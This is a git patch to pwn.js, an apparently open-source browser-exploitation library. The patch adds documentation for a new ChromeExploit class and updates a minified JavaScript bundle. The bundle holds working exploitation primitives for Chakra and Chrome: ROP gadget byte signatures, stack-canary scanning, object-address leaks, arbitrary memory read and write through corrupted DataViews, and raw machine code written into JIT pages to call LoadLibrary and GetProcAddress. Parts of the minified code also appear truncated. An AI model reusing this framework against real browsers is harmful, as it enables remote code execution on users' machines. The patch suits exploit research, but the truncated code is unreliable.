From 44838d5946dedc46a8865e5d8053fad72dee701a Mon Sep 17 00:00:00 2001 From: Brian Pak Date: Sat, 31 Mar 2018 18:25:18 -0700 Subject: [PATCH] Update version and docs. --- dist/pwn.min.js | 7 +- docs/BaseExploit.html | 44 +- docs/BaseExploit_ArrayType.html | 6 +- docs/BaseExploit_CString.html | 6 +- docs/BaseExploit_FunctionType.html | 8 +- docs/BaseExploit_IntType.html | 6 +- docs/BaseExploit_Pointer.html | 16 +- docs/BaseExploit_PointerType.html | 8 +- docs/BaseExploit_StructPointer.html | 6 +- docs/BaseExploit_StructType.html | 6 +- docs/BaseExploit_Type.html | 8 +- docs/BaseExploit_WString.html | 6 +- docs/ChakraExploit.html | 72 +- docs/ChakraExploit_ArrayType.html | 6 +- docs/ChakraExploit_CString.html | 6 +- docs/ChakraExploit_FunctionType.html | 6 +- docs/ChakraExploit_IntType.html | 6 +- docs/ChakraExploit_Pointer.html | 6 +- docs/ChakraExploit_PointerType.html | 6 +- docs/ChakraExploit_StructPointer.html | 6 +- docs/ChakraExploit_StructType.html | 6 +- docs/ChakraExploit_Thread.html | 4 +- docs/ChakraExploit_Type.html | 6 +- docs/ChakraExploit_WString.html | 6 +- docs/ChakraThreadExploit.html | 76 +- docs/ChakraThreadExploit_ArrayType.html | 6 +- docs/ChakraThreadExploit_CString.html | 6 +- docs/ChakraThreadExploit_FunctionType.html | 6 +- docs/ChakraThreadExploit_IntType.html | 6 +- docs/ChakraThreadExploit_Pointer.html | 6 +- docs/ChakraThreadExploit_PointerType.html | 6 +- docs/ChakraThreadExploit_StructPointer.html | 6 +- docs/ChakraThreadExploit_StructType.html | 6 +- docs/ChakraThreadExploit_Thread.html | 4 +- docs/ChakraThreadExploit_Type.html | 6 +- docs/ChakraThreadExploit_WString.html | 6 +- docs/ChromeExploit.html | 2915 +++++++++++++++++++ docs/ChromeExploit_ArrayType.html | 263 ++ docs/ChromeExploit_CString.html | 240 ++ docs/ChromeExploit_FunctionType.html | 240 ++ docs/ChromeExploit_IntType.html | 263 ++ docs/ChromeExploit_Pointer.html | 252 ++ docs/ChromeExploit_PointerType.html | 240 ++ docs/ChromeExploit_StructPointer.html | 252 ++ docs/ChromeExploit_StructType.html | 283 ++ docs/ChromeExploit_Type.html | 180 ++ docs/ChromeExploit_WString.html | 240 ++ docs/baseexploit.js.html | 33 +- docs/chakraexploit.js.html | 77 +- docs/chakrathreadexploit.js.html | 4 +- docs/chromeexploit.js.html | 296 ++ docs/global.html | 4 +- docs/global.html#Integer | 4 +- docs/index.html | 13 +- docs/integer.js.html | 4 +- package.json | 2 +- 56 files changed, 5948 insertions(+), 260 deletions(-) create mode 100644 docs/ChromeExploit.html create mode 100644 docs/ChromeExploit_ArrayType.html create mode 100644 docs/ChromeExploit_CString.html create mode 100644 docs/ChromeExploit_FunctionType.html create mode 100644 docs/ChromeExploit_IntType.html create mode 100644 docs/ChromeExploit_Pointer.html create mode 100644 docs/ChromeExploit_PointerType.html create mode 100644 docs/ChromeExploit_StructPointer.html create mode 100644 docs/ChromeExploit_StructType.html create mode 100644 docs/ChromeExploit_Type.html create mode 100644 docs/ChromeExploit_WString.html create mode 100644 docs/chromeexploit.js.html diff --git a/dist/pwn.min.js b/dist/pwn.min.js index 10ea29d..639041c 100644 --- a/dist/pwn.min.js +++ b/dist/pwn.min.js @@ -1 +1,6 @@ -var pwnjs=function(t){var i={};function r(e){if(i[e])return i[e].exports;var n=i[e]={i:e,l:!1,exports:{}};return t[e].call(n.exports,n,n.exports,r),n.l=!0,n.exports}return r.m=t,r.c=i,r.d=function(t,i,e){r.o(t,i)||Object.defineProperty(t,i,{configurable:!1,enumerable:!0,get:e})},r.n=function(t){var i=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(i,"a",i),i},r.o=function(t,i){return Object.prototype.hasOwnProperty.call(t,i)},r.p="",r(r.s=3)}([function(t,i,r){"use strict";var e=function(){function t(t,i,r,e){this.size=e||64,8==e?(t&=255,r||t<128?i=0:(t|=4294967040,i=4294967295)):16==e?(t&=65535,r||t<32768?i=0:(t|=4294901760,i=4294967295)):32==e&&(i=r||(0|t)>=0?0:4294967295),this.low=0|t,this.high=0|i,this.unsigned=!!r}function i(t){return!0===(t&&t.__isInteger__)}t.prototype.__isInteger__,Object.defineProperty(t.prototype,"__isInteger__",{value:!0,enumerable:!1,configurable:!1}),t.isInteger=i;var r={},e={};function n(t,i){var n,s,o;return i?(o=0<=(t>>>=0)&&t<256)&&(s=e[t])?s:(n=a(t,(0|t)<0?-1:0,!0),o&&(e[t]=n),n):(o=-128<=(t|=0)&&t<128)&&(s=r[t])?s:(n=a(t,t<0?-1:0,!1),o&&(r[t]=n),n)}function s(t,i){if(isNaN(t)||!isFinite(t))return i?p:f;if(i){if(t<0)return p;if(t>=c)return b}else{if(t<=-g)return P;if(t+1>=g)return w}return t<0?s(-t,i).neg():a(t%u|0,t/u|0,i)}function a(i,r,e){return new t(i,r,e)}t.fromInt=n,t.fromNumber=s,t.fromBits=a;var o=Math.pow;function h(t,i,r){if(0===t.length)throw Error("empty string");if("NaN"===t||"Infinity"===t||"+Infinity"===t||"-Infinity"===t)return f;if("number"==typeof i?(r=i,i=!1):i=!!i,(r=r||10)<2||360)throw Error("interior hyphen");if(0===e)return h(t.substring(1),i,r).neg();for(var n=s(o(r,8)),a=f,d=0;d>>0:this.low},E.toNumber=function(){return this.unsigned?(this.high>>>0)*u+(this.low>>>0):this.high*u+(this.low>>>0)},E.toString=function(t){if((t=t||10)<2||36>>0).toString(t);if((a=d).isZero())return u+h;for(;u.length<6;)u="0"+u;h=""+u+h}},E.getHighBits=function(){return this.high},E.getHighBitsUnsigned=function(){return this.high>>>0},E.getLowBits=function(){return this.low},E.getLowBitsUnsigned=function(){return this.low>>>0},E.getNumBitsAbs=function(){if(this.isNegative())return this.eq(P)?64:this.neg().getNumBitsAbs();for(var t=0!=this.high?this.high:this.low,i=31;i>0&&0==(t&1<=0},E.isOdd=function(){return 1==(1&this.low)},E.isEven=function(){return 0==(1&this.low)},E.equals=function(t){return i(t)||(t=d(t)),(this.unsigned===t.unsigned||this.high>>>31!=1||t.high>>>31!=1)&&(this.high===t.high&&this.low===t.low)},E.eq=E.equals,E.notEquals=function(t){return!this.eq(t)},E.neq=E.notEquals,E.lessThan=function(t){return this.comp(t)<0},E.lt=E.lessThan,E.lessThanOrEqual=function(t){return this.comp(t)<=0},E.lte=E.lessThanOrEqual,E.greaterThan=function(t){return this.comp(t)>0},E.gt=E.greaterThan,E.greaterThanOrEqual=function(t){return this.comp(t)>=0},E.gte=E.greaterThanOrEqual,E.compare=function(t){if(i(t)||(t=d(t)),this.eq(t))return 0;var r=this.isNegative(),e=t.isNegative();return r&&!e?-1:!r&&e?1:this.unsigned?t.high>>>0>this.high>>>0||t.high===this.high&&t.low>>>0>this.low>>>0?-1:1:this.sub(t).isNegative()?-1:1},E.comp=E.compare,E.negate=function(){return!this.unsigned&&this.eq(P)?P:this.not().add(_)},E.neg=E.negate,E.add=function(t){i(t)||(t=d(t));var r=this.high>>>16,e=65535&this.high,n=this.low>>>16,s=65535&this.low,o=t.high>>>16,h=65535&t.high,u=t.low>>>16,c=0,g=0,l=0,f=0;return l+=(f+=s+(65535&t.low))>>>16,g+=(l+=n+u)>>>16,c+=(g+=e+h)>>>16,c+=r+o,a((l&=65535)<<16|(f&=65535),(c&=65535)<<16|(g&=65535),this.unsigned,this.size)},E.subtract=function(t){return i(t)||(t=d(t)),this.add(t.neg())},E.sub=E.subtract,E.multiply=function(t){if(this.isZero())return f;if(i(t)||(t=d(t)),t.isZero())return f;if(this.eq(P))return t.isOdd()?P:f;if(t.eq(P))return this.isOdd()?P:f;if(this.isNegative())return t.isNegative()?this.neg().mul(t.neg()):this.neg().mul(t).neg();if(t.isNegative())return this.mul(t.neg()).neg();if(this.lt(l)&&t.lt(l))return s(this.toNumber()*t.toNumber(),this.unsigned);var r=this.high>>>16,e=65535&this.high,n=this.low>>>16,o=65535&this.low,h=t.high>>>16,u=65535&t.high,c=t.low>>>16,g=65535&t.low,p=0,_=0,y=0,v=0;return y+=(v+=o*g)>>>16,_+=(y+=n*g)>>>16,y&=65535,_+=(y+=o*c)>>>16,p+=(_+=e*g)>>>16,_&=65535,p+=(_+=n*c)>>>16,_&=65535,p+=(_+=o*u)>>>16,p+=r*g+e*c+n*u+o*h,a((y&=65535)<<16|(v&=65535),(p&=65535)<<16|(_&=65535),this.unsigned,this.size)},E.mul=E.multiply,E.divide=function(t){if(i(t)||(t=d(t)),t.isZero())throw Error("division by zero");if(this.isZero())return this.unsigned?p:f;var r,e,n;if(this.unsigned){if(t.unsigned||(t=t.toUnsigned()),t.gt(this))return p;if(t.gt(this.shru(1)))return y;n=p}else{if(this.eq(P))return t.eq(_)||t.eq(v)?P:t.eq(P)?_:(r=this.shr(1).div(t).shl(1)).eq(f)?t.isNegative()?_:v:(e=this.sub(t.mul(r)),n=r.add(e.div(t)));else if(t.eq(P))return this.unsigned?p:f;if(this.isNegative())return t.isNegative()?this.neg().div(t.neg()):this.neg().div(t).neg();if(t.isNegative())return this.div(t.neg()).neg();n=f}for(e=this;e.gte(t);){r=Math.max(1,Math.floor(e.toNumber()/t.toNumber()));for(var a=Math.ceil(Math.log(r)/Math.LN2),h=a<=48?1:o(2,a-48),u=s(r),c=u.mul(t);c.isNegative()||c.gt(e);)c=(u=s(r-=h,this.unsigned)).mul(t);u.isZero()&&(u=_),n=n.add(u),e=e.sub(c)}return n},E.div=E.divide,E.modulo=function(t){return i(t)||(t=d(t)),this.sub(this.div(t).mul(t))},E.mod=E.modulo,E.not=function(){return a(~this.low,~this.high,this.unsigned,this.size)},E.and=function(t){return i(t)||(t=d(t)),a(this.low&t.low,this.high&t.high,this.unsigned,this.size)},E.or=function(t){return i(t)||(t=d(t)),a(this.low|t.low,this.high|t.high,this.unsigned,this.size)},E.xor=function(t){return i(t)||(t=d(t)),a(this.low^t.low,this.high^t.high,this.unsigned,this.size)},E.shiftLeft=function(t){return i(t)&&(t=t.toInt()),0==(t&=63)?this:t<32?a(this.low<>>32-t,this.unsigned,this.size):a(0,this.low<>>t|this.high<<32-t,this.high>>t,this.unsigned,this.size):a(this.high>>t-32,this.high>=0?0:-1,this.unsigned,this.size)},E.shr=E.shiftRight,E.shiftRightUnsigned=function(t){if(i(t)&&(t=t.toInt()),0===(t&=63))return this;var r=this.high;return t<32?a(this.low>>>t|r<<32-t,r>>>t,this.unsigned,this.size):a(32===t?r:r>>>t-32,0,this.unsigned,this.size)},E.shru=E.shiftRightUnsigned,E.toSigned=function(){return this.unsigned?a(this.low,this.high,!1,this.size):this},E.toUnsigned=function(){return this.unsigned?this:a(this.low,this.high,!0,this.size)},E.toBytes=function(t){return t?this.toBytesLE():this.toBytesBE()},E.toBytesLE=function(){var t=this.high,i=this.low;return[255&i,i>>>8&255,i>>>16&255,i>>>24&255,255&t,t>>>8&255,t>>>16&255,t>>>24&255]},E.toBytesBE=function(){var t=this.high,i=this.low;return[t>>>24&255,t>>>16&255,t>>>8&255,255&t,i>>>24&255,i>>>16&255,i>>>8&255,255&i]},t}();i.a=e},function(t,i,r){"use strict";var e=r(0);function n(t){var i=t/8,r=t/8,n={},s=[],a=this;function o(t){for(var i=new Uint8Array(t.length+1),r=0;r>>0&255)!=a&&(h>>>8&255)!=a&&(h>>>16&255)!=a&&(h>>>24&255)!=a){o+=3;continue}}for(var d=0;d=0&&i[d]!=r[o+d]);d++);if(d==s)return r.add(o);o+=d}return null},n.prototype.findGadgets=function(t,i){for(var r=this.Uint8Ptr.cast(t),e=this.Uint32Ptr.cast(r.add(60))[0],n=this.Uint32Ptr.cast(t.add(e))[7],s=new Int32Array(n/4),a=r.address.add(4096),o=4096;o{for(var i=t[0],e=t[1],n=0;;){if((n=d.indexOf(e[0],n))<0)throw"missing gadget "+i;for(var s=1;s=0&&d[n+s]!=e[s]);s++);if(s==e.length)break;n++}u[i]=r.add(n)}),u},i.a=n},function(module,__webpack_exports__,__webpack_require__){"use strict";var __WEBPACK_IMPORTED_MODULE_0_baseexploit__=__webpack_require__(1),__WEBPACK_IMPORTED_MODULE_1_integer__=__webpack_require__(0);function ChakraExploit(){var t=this;__WEBPACK_IMPORTED_MODULE_0_baseexploit__.a.call(this,64),this.Thread=function(i){var r=new Worker(i);r.onmessage=(i=>{if("CHAKRA_EXPLOIT"==i.data){for(var r=t.globalListFirst.load()[t.threadContextStackLimit].sub(49152).add(1048576),e=t.Uint64Ptr.cast(r).add(-1);!new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1094861636,65536).eq(e.load());)if((e=e.add(-1)).address<=r.sub(65536))throw"unable to find canary";var n=t.Uint64Ptr.cast(e[1]);t.Uint64Ptr.cast(e[2])[7]=n}else if(this.onmessage)return this.onmessage(i)}),this.onmessage=null,this.postMessage=r.postMessage.bind(r)}}ChakraExploit.prototype=Object.create(__WEBPACK_IMPORTED_MODULE_0_baseexploit__.a.prototype),ChakraExploit.prototype.constructor=ChakraExploit,ChakraExploit.prototype.initChakra=function(t){this.chakraBase=this.findModuleBase(t);if(this.gadgets=this.findGadgets(this.chakraBase,[["callLoadLibraryExW",[72,139,200,51,210,65,184,0,8,0,0,255,21]],["jmpGetProcAddress",[72,139,193,72,139,73,8,72,133,201,116,11,72,131,196,40,72,255,37]],["nopReturn",[195]],["popRaxReturn",[88,195]],["popRdxReturn",[90,195]],["popRspReturn",[92,195]],["popRbpReturn",[93,195]],["addRsp58Return",[72,131,196,88,195]],["storeRaxAtRdxReturn",[72,137,2,195]],["entrySlice",[139,248,65,131,-1,2]],["amd64CallFunction",[76,139,78,8,76,139,6,72,131,236,32,255]],["linkToBeginningThreadContext",[72,139,196,76,137,64,24,72,137,80,16,72,137,72,8,72,131,-1,-1,0]],["popRcxRdxR8R9Return",[72,139,76,36,8,72,139,84,36,16,76,139,68,36,24,76,139,76,36,32,72,255,224]],["addRsp28Return",[72,131,196,40,195]]]),this.amd64CallFunctionReturnOffset=208==this.gadgets.amd64CallFunction[12]?13:17,97==this.gadgets.linkToBeginningThreadContext[17])this.threadContextPrev=this.gadgets.linkToBeginningThreadContext[18]/8,this.threadContextNext=this.gadgets.linkToBeginningThreadContext[30]/8,this.globalListFirst=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(27).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(23))[0]));else{if(161!=this.gadgets.linkToBeginningThreadContext[17])throw"unsupported version";this.threadContextPrev=this.gadgets.linkToBeginningThreadContext[18]/8,this.threadContextNext=this.gadgets.linkToBeginningThreadContext[33]/8,this.globalListFirst=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(30).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(26))[0]))}for(var i=this.globalListFirst[0],r=0;49152!=(65535&i[r]);r++);this.threadContextStackLimit=r;i=this.gadgets.callLoadLibraryExW.add(17).add(this.Int32Ptr.cast(this.gadgets.callLoadLibraryExW.add(13)).load());this.LoadLibraryExW=new this.PointerType(this.Uint8Ptr).cast(i).load();i=this.gadgets.jmpGetProcAddress.add(23).add(this.Int32Ptr.cast(this.gadgets.jmpGetProcAddress.add(19)).load());if(this.GetProcAddress=new this.PointerType(this.Uint8Ptr).cast(i).load(),this.findStackTop(),this.locateArray=[{}],this.locateArrayPtr=new this.PointerType(this.Uint64Ptr).cast(this.addressOfSlow(this.locateArray))[5].add(3),!this.addressOfSlow(this.locateArray[0]).address.eq(this.locateArrayPtr[0]))throw"init of addressOf failed!"},ChakraExploit.prototype.addressOf=function(t){return this.locateArray[0]=t,this.locateArrayPtr[0]},ChakraExploit.prototype.addressOfArrayBuffer=function(t){var i=new DataView(t);return this.Uint64Ptr.cast(this.addressOf(i))[7]},ChakraExploit.prototype.findStackTop=function(){if(void 0===this.stackTop){if("undefined"!=typeof WorkerGlobalScope)var t=this.globalListFirst.load()[this.threadContextStackLimit],i=1048576;else t=this.globalListFirst.load()[this.threadContextStackLimit],i=10485760;var r=t.sub(49152).add(i);this.stackTop=r}},ChakraExploit.prototype.addressOfSlow=function(obj){var address;return eval("String.prototype.slice").call("",{valueOf:()=>{for(var t=this.gadgets,i=this.Uint64Ptr.cast(this.stackTop).add(-1);!this.Uint64.cast(t.entrySlice).eq(i.load());)if((i=i.add(-1)).address<=this.stackTop.sub(65536))throw"unable to find entrySlice";for(;!this.Uint64.cast(t.amd64CallFunction).add(this.amd64CallFunctionReturnOffset).eq(i.load());)if((i=i.add(1)).address>=this.stackTop)throw"unable to find amd64CallFunction";for(;!i[0].eq(new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1111638594,65536))||!i[2].eq(new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1094795585,65536));)if((i=i.add(1)).address>=this.stackTop)throw"unable to find canaries";address=this.Uint8Ptr.cast(i[1])}},0,0,0,obj,1111638594,obj,1094795585),address},ChakraExploit.prototype.customInt32Array=function(t){var i=new Int32Array(1),r=this.Uint64Ptr.cast(this.addressOf(i));return r[4]=2147483647,r[7]=t,i},ChakraExploit.prototype.call=function(address,...args){if(args.length>10)throw"too many arguments";var returnValAddr;return eval("String.prototype.slice").call("",{valueOf:()=>{for(var t=this.gadgets,i=this.Uint64.cast(t.amd64CallFunction).add(this.amd64CallFunctionReturnOffset),r=this.Uint64.cast(t.entrySlice),e=this.stackTop.sub(65536),n=this.customInt32Array(e),s=8184;s>=0&&(r.low!=n[2*s]||r.high!=n[2*s+1]);s-=1);if(0==s)throw"unable to find entrySlice";for(;i.low!=n[2*s]||i.high!=n[2*s+1];)if(8192==++s)throw"unable to find amd64CallFunction";var a=(n=this.Uint64Ptr.cast(e.add(8*s))).add(-2);n=n.add(-16384);var o=this.customInt32Array(n);for(s=32;s>=0;s--){o[4096*s/4]}function h(t,i,r){r=r.address?r.address:__WEBPACK_IMPORTED_MODULE_1_integer__.a.fromValue(r),t[2*i+0]=r.low,t[2*i+1]=r.high}h(o,s=4,t.popRaxReturn),h(o,++s,t.addRsp28Return),h(o,++s,t.popRcxRdxR8R9Return),s++,s++,void 0!==args[0]&&h(o,s,args[0]),s++,void 0!==args[1]&&h(o,s,args[1]),s++,void 0!==args[2]&&h(o,s,args[2]),s++,void 0!==args[3]&&h(o,s,args[3]),h(o,++s,t.nopReturn),h(o,++s,address),h(o,++s,t.addRsp58Return),s++,s+=4,void 0!==args[4]&&h(o,s,args[4]),s++,void 0!==args[5]&&h(o,s,args[5]),s++,void 0!==args[6]&&h(o,s,args[6]),s++,void 0!==args[7]&&h(o,s,args[7]),s++,void 0!==args[8]&&h(o,s,args[8]),s++,void 0!==args[9]&&h(o,s,args[9]),s++,void 0!==args[10]&&h(o,s,args[10]),h(o,++s,t.popRdxReturn),h(o,++s,n),h(o,++s,t.storeRaxAtRdxReturn),h(o,++s,t.popRaxReturn),h(o,++s,new __WEBPACK_IMPORTED_MODULE_1_integer__.a(0,262144)),h(o,++s,t.popRbpReturn),h(o,++s,a.load()),h(o,++s,t.popRspReturn),h(o,++s,a.add(2)),s++,a[0]=n,returnValAddr=n}}),returnValAddr[0]},__webpack_exports__.a=ChakraExploit},function(t,i,r){"use strict";Object.defineProperty(i,"__esModule",{value:!0});var e=r(1),n=r(2),s=r(4),a=r(5),o=r(0);r.d(i,"BaseExploit",function(){return e.a}),r.d(i,"ChakraExploit",function(){return n.a}),r.d(i,"ChakraThreadExploit",function(){return s.a}),r.d(i,"ChromeExploit",function(){return a.a}),r.d(i,"Integer",function(){return o.a})},function(module,__webpack_exports__,__webpack_require__){"use strict";var __WEBPACK_IMPORTED_MODULE_0_chakraexploit__=__webpack_require__(2),__WEBPACK_IMPORTED_MODULE_1_integer__=__webpack_require__(0);function ChakraThreadExploit(){__WEBPACK_IMPORTED_MODULE_0_chakraexploit__.a.call(this);var dvManager=new DataView(new ArrayBuffer(4096)),dvWorker=new DataView(new ArrayBuffer(4096));this.dvWorker=dvWorker,this.dvManager=dvManager,eval("String.prototype.slice").call("",{valueOf:function(){for(postMessage("CHAKRA_EXPLOIT");0==dvManager.getInt32(0););}},0,0,0,0,1094861636,dvWorker,dvManager,1094795585);var vtable=new __WEBPACK_IMPORTED_MODULE_1_integer__.a(dvManager.getInt32(0,!0),dvManager.getInt32(4,!0));this.vtable=vtable,this.chakraBase=this.findModuleBase(vtable),this.initChakra(vtable)}ChakraThreadExploit.prototype=Object.create(__WEBPACK_IMPORTED_MODULE_0_chakraexploit__.a.prototype),ChakraThreadExploit.prototype.constructor=ChakraThreadExploit,ChakraThreadExploit.prototype.read=function(t,i){switch(this.dvManager.setInt32(56,t.low,!0),this.dvManager.setInt32(60,t.high,!0),i){case 8:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt8(0,!0),0,!0);case 16:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt16(0,!0),0,!0);case 32:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt32(0,!0),0,!0);case 64:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt32(0,!0),this.dvWorker.getInt32(4,!0),!0)}},ChakraThreadExploit.prototype.write=function(t,i,r){switch(this.dvManager.setInt32(56,t.low,!0),this.dvManager.setInt32(60,t.high,!0),r){case 8:return this.dvWorker.setInt8(0,0|i.low,!0);case 16:return this.dvWorker.setInt16(0,0|i.low,!0);case 32:return this.dvWorker.setInt32(0,0|i.low,!0);case 64:this.dvWorker.setInt32(0,0|i.low,!0),this.dvWorker.setInt32(4,0|i.high,!0)}},__webpack_exports__.a=ChakraThreadExploit},function(t,i,r){"use strict";var e=r(1);r(0);function n(){e.a.call(this,64)}n.prototype=Object.create(e.a.prototype),n.prototype.constructor=n,n.prototype.initChrome=function(t){this.chromeBase=this.findModuleBase(t);for(var i="",r=0;r<1e3;r++)i+="x["+r+"] += "+Math.random()+";\n";this.jitFunction=new Function("x",i);var e=new Array(1e3).fill(0);for(r=0;r<1e4;r++)this.jitFunction(e);this.gadgets=this.findGadgets(this.chromeBase,[["loadLibraryGetProcAddress",[72,141,13,-1,-1,-1,-1,255,21,-1,-1,-1,-1,72,139,248,72,133,192,15,132,-1,-1,-1,-1,72,141,21,-1,-1,-1,-1,72,139,200,255,21,-1,-1,-1,-1]],["mainThreadStack",[72,139,5,-1,-1,-1,-1,72,141,76,36,-1,72,43,193,72,141,29,-1,-1,-1,-1,72,59,5,-1,-1,-1,-1]]]),this.mainThreadStackBase=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.mainThreadStack).add(7).add(this.Int32Ptr.cast(this.gadgets.mainThreadStack.add(3))[0]))[0],this.LoadLibraryW=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(13).add(this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(9))[0]))[0],this.GetProcAddress=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(41).add(this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(37))[0]))[0]},n.prototype.addressOf=function(t){var i=[t];return this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOfSlow(i))[2].sub(1))[2].sub(1)},n.prototype.addressOfArrayBuffer=function(t){return this.Uint64Ptr.cast(this.addressOf(t))[4]},n.prototype.addressOfSlow=function(t){var i,r=this.mainThreadStackBase;return t.toString=function(){for(var t=0;t>-4096;t--)if(322507578==r[t-2].high&&322376504==r[t-1].high){i=r[t].sub(1);break}return""},String.prototype.indexOf.call(t,322376504,322507578),i},n.prototype.call=function(t,...i){var r=this;function e(t){return t.high<=32767&&1==(7&t.low)}function n(t,i){return t[0]=72,t[1]=131,t[2]=196,t[3]=i,t.add(4)}function s(t,i){return t[0]=72,t[1]=184,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function a(t,i){return t[0]=72,t[1]=185,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function o(t,i){return t[0]=72,t[1]=186,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function h(t,i){return t[0]=73,t[1]=184,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function d(t,i){return t[0]=73,t[1]=185,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function u(t){return t[0]=80,t.add(1)}var c=this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOf(this.jitFunction))[7].sub(1));if(e(c[0])&&e(c[1])&&e(c[2])&&e(c[3]))var g=this.Uint8Ptr.cast(c).add(96);else g=this.Uint8Ptr.cast(c);var l=this.Uint64Ptr.cast(g.add(512));i.length>4&&1&i.length&&i.push(0);var f=g;f=function(t){return t[0]=85,t[1]=72,t[2]=137,t[3]=229,t[4]=72,t[5]=131,t[6]=228,t[7]=240,t.add(8)}(f=function(t,i){return t[0]=233,r.Int32Ptr.cast(t.add(1))[0]=i,t.add(5)}(f,4096).add(4096));for(var p=i.length-1;p>=0;p--)f=0==p?a(f,i[p]):1==p?o(f,i[p]):2==p?h(f,i[p]):3==p?d(f,i[p]):u(f=s(f,i[p]));return f=function(t){return t[0]=201,t[1]=195,t.add(2)}(f=function(t,i){return t[0]=72,t[1]=163,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}(f=n(f=function(t){return t[0]=255,t[1]=208,t.add(2)}(f=s(f=n(f,-32),t)),32),l)),this.jitFunction(),l[0]},i.a=n}]); \ No newline at end of file +var pwnjs=function(t){var i={};function r(e){if(i[e])return i[e].exports;var n=i[e]={i:e,l:!1,exports:{}};return t[e].call(n.exports,n,n.exports,r),n.l=!0,n.exports}return r.m=t,r.c=i,r.d=function(t,i,e){r.o(t,i)||Object.defineProperty(t,i,{configurable:!1,enumerable:!0,get:e})},r.n=function(t){var i=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(i,"a",i),i},r.o=function(t,i){return Object.prototype.hasOwnProperty.call(t,i)},r.p="",r(r.s=3)}([function(t,i,r){"use strict"; +/** + * @license long.js (c) 2013 Daniel Wirtz + * Released under the Apache License, Version 2.0 + * see: https://github.com/dcodeIO/long.js for details + */var e=function(){function t(t,i,r,e){this.size=e||64,8==e?(t&=255,r||t<128?i=0:(t|=4294967040,i=4294967295)):16==e?(t&=65535,r||t<32768?i=0:(t|=4294901760,i=4294967295)):32==e&&(i=r||(0|t)>=0?0:4294967295),this.low=0|t,this.high=0|i,this.unsigned=!!r}function i(t){return!0===(t&&t.__isInteger__)}t.prototype.__isInteger__,Object.defineProperty(t.prototype,"__isInteger__",{value:!0,enumerable:!1,configurable:!1}),t.isInteger=i;var r={},e={};function n(t,i){var n,s,o;return i?(o=0<=(t>>>=0)&&t<256)&&(s=e[t])?s:(n=a(t,(0|t)<0?-1:0,!0),o&&(e[t]=n),n):(o=-128<=(t|=0)&&t<128)&&(s=r[t])?s:(n=a(t,t<0?-1:0,!1),o&&(r[t]=n),n)}function s(t,i){if(isNaN(t)||!isFinite(t))return i?p:f;if(i){if(t<0)return p;if(t>=c)return b}else{if(t<=-g)return P;if(t+1>=g)return w}return t<0?s(-t,i).neg():a(t%u|0,t/u|0,i)}function a(i,r,e){return new t(i,r,e)}t.fromInt=n,t.fromNumber=s,t.fromBits=a;var o=Math.pow;function h(t,i,r){if(0===t.length)throw Error("empty string");if("NaN"===t||"Infinity"===t||"+Infinity"===t||"-Infinity"===t)return f;if("number"==typeof i?(r=i,i=!1):i=!!i,(r=r||10)<2||360)throw Error("interior hyphen");if(0===e)return h(t.substring(1),i,r).neg();for(var n=s(o(r,8)),a=f,d=0;d>>0:this.low},E.toNumber=function(){return this.unsigned?(this.high>>>0)*u+(this.low>>>0):this.high*u+(this.low>>>0)},E.toString=function(t){if((t=t||10)<2||36>>0).toString(t);if((a=d).isZero())return u+h;for(;u.length<6;)u="0"+u;h=""+u+h}},E.getHighBits=function(){return this.high},E.getHighBitsUnsigned=function(){return this.high>>>0},E.getLowBits=function(){return this.low},E.getLowBitsUnsigned=function(){return this.low>>>0},E.getNumBitsAbs=function(){if(this.isNegative())return this.eq(P)?64:this.neg().getNumBitsAbs();for(var t=0!=this.high?this.high:this.low,i=31;i>0&&0==(t&1<=0},E.isOdd=function(){return 1==(1&this.low)},E.isEven=function(){return 0==(1&this.low)},E.equals=function(t){return i(t)||(t=d(t)),(this.unsigned===t.unsigned||this.high>>>31!=1||t.high>>>31!=1)&&(this.high===t.high&&this.low===t.low)},E.eq=E.equals,E.notEquals=function(t){return!this.eq(t)},E.neq=E.notEquals,E.lessThan=function(t){return this.comp(t)<0},E.lt=E.lessThan,E.lessThanOrEqual=function(t){return this.comp(t)<=0},E.lte=E.lessThanOrEqual,E.greaterThan=function(t){return this.comp(t)>0},E.gt=E.greaterThan,E.greaterThanOrEqual=function(t){return this.comp(t)>=0},E.gte=E.greaterThanOrEqual,E.compare=function(t){if(i(t)||(t=d(t)),this.eq(t))return 0;var r=this.isNegative(),e=t.isNegative();return r&&!e?-1:!r&&e?1:this.unsigned?t.high>>>0>this.high>>>0||t.high===this.high&&t.low>>>0>this.low>>>0?-1:1:this.sub(t).isNegative()?-1:1},E.comp=E.compare,E.negate=function(){return!this.unsigned&&this.eq(P)?P:this.not().add(_)},E.neg=E.negate,E.add=function(t){i(t)||(t=d(t));var r=this.high>>>16,e=65535&this.high,n=this.low>>>16,s=65535&this.low,o=t.high>>>16,h=65535&t.high,u=t.low>>>16,c=0,g=0,l=0,f=0;return 